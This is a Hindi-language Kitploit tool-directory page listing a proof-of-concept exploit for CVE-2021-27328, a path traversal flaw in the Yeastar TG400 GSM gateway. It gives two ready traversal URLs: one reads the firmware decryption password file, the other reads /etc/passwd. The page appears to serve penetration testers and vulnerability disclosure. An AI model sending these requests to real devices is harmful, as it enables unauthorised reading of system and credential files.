Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-27328 — CVE-2021-27328 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Yeastar TG400 GSM गेटवे में एक पथ ट्रैवर्सल भेद्यता, जो WebCGI एंडपॉइंट पर एक निर्मित HTTP अनुरोध के माध्यम से मनमाना फ़ाइल पढ़ने का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/sqsamir/cve-2021-27328
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubsqsamir/cve-2021-27328

CVE-2021-27328

CVE-2021-27328 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Yeastar TG400 GSM गेटवे में एक पथ ट्रैवर्सल भेद्यता, जो WebCGI एंडपॉइंट पर एक निर्मित HTTP अनुरोध के माध्यम से मनमाना फ़ाइल पढ़ने का प्रदर्शन करता है।

रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

यीस्टार TG400 GSM गेटवे - 91.3.0.3 पर पाथ ट्रैवर्सल

यह CVE-2021-27328 के लिए एक प्रूफ ऑफ कॉन्सेप्ट है

उदाहरण

  • फर्मवेयर डिक्रिप्टिंग पासवर्ड प्राप्त करने के लिए
root@kitploit:~
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect

ZIP पासवर्ड

  • /etc/paswd प्राप्त करने के लिए
root@kitploit:~
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd

/etc/passwd

टूल डाउनलोड करें